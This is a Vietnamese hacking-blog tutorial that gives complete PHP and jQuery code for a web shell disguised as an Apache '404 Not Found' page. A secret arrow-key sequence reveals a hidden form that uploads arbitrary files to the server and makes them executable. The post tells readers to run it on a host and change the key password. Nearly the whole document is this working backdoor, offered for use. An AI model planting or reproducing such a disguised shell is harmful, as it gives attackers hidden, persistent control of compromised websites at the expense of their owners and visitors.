Thứ Tư, 12 tháng 9, 2012
[Tut] Nguỵ trang shell kiểu úc
1. Anh em tạo 1 file leoshell.php nội dung như sau:
<?php
if(isset($_FILES["File"]))
{
define("DS",DIRECTORY_SEPARATOR);
echo "<body style='background:#000;color:#66ff00'>";
$Path=explode(DS,__FILE__);
unset($Path[count($Path)-1]);
$Path=implode(DS,$Path);
$Path.=DS.$_FILES["File"]["name"];
if ($_FILES["File"]["error"] > 0)
{
echo "Error: " . $_FILES["File"]["error"] . "<br />";
}
else if(move_uploaded_file($_FILES["File"]["tmp_name"],$Path))
{
echo "Stored in: " .$Path;
@chmod($Path,0755);
}
echo "</body>";
exit;
}
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.8.1.min.js"></script>
<script type="text/javascript">
$(document).ready(function(){
var password="[left][right][left][right][up][down]";
var passwordType="";
$('body').keydown(function(e) {
if(passwordType=="[END]"){return false;}
switch(eval(e.which))
{
case 37:{
passwordType+="[left]";
break;
}
case 38:{
passwordType+="[up]";
break;
}
case 39:{
passwordType+="[right]";
break;
}
case 40:{
passwordType+="[down]";
break;
}
default:{
passwordType+="";
break;
}
}
if(passwordType.indexOf(password)>=0)
{
passwordType="[END]";
$("body").fadeOut(1000,function(){
$("body").css({"background":"#000000","color":"#66 ff00"});
$("body").fadeIn(1000,function(){
$("body h1").fadeOut(500,function(){
$("body h1").html("Welcome back, my Hacker !");
$("body h1").fadeIn(500);
$("body p").eq(0).fadeOut(500,function(){
$(this).html("<form method='post' enctype='multipart/form-data'>Select file to upload: <input type='file' name='File'/><input type='submit'/>");
$(this).fadeIn(500);
$("title").html("Hacked !!!!");
$("p").eq(1).html("");
$("address").html("Coded by Leorius !");
});
});
});
});
}
});
});
</script>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?=$_SERVER['REQUEST_URI']?> was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_qos/9.74 mod_bwlimited/1.4 Server at <?=$_SERVER['SERVER_NAME']?> Port 80</address>
</body></html>
2. Chạy file leoshell.php trên host, sẽ thấy trang 404 file not found, anh em bình tĩnh, gõ lần lượt các phím [trái] [phải] [trái] [phải] [lên] [xuống], kho báu sẽ hiện ra
3. Các bảo có thể edit mật khẩu ở đoạn, theo đúng các cú pháp [left][up][right][down]:
var password="[left][right][left][right][up][down]"
Nguồn: VHB
Chuyên Mục:
Local Attack,
Shell
Đăng ký:
Đăng Nhận xét (Atom)
Không có nhận xét nào: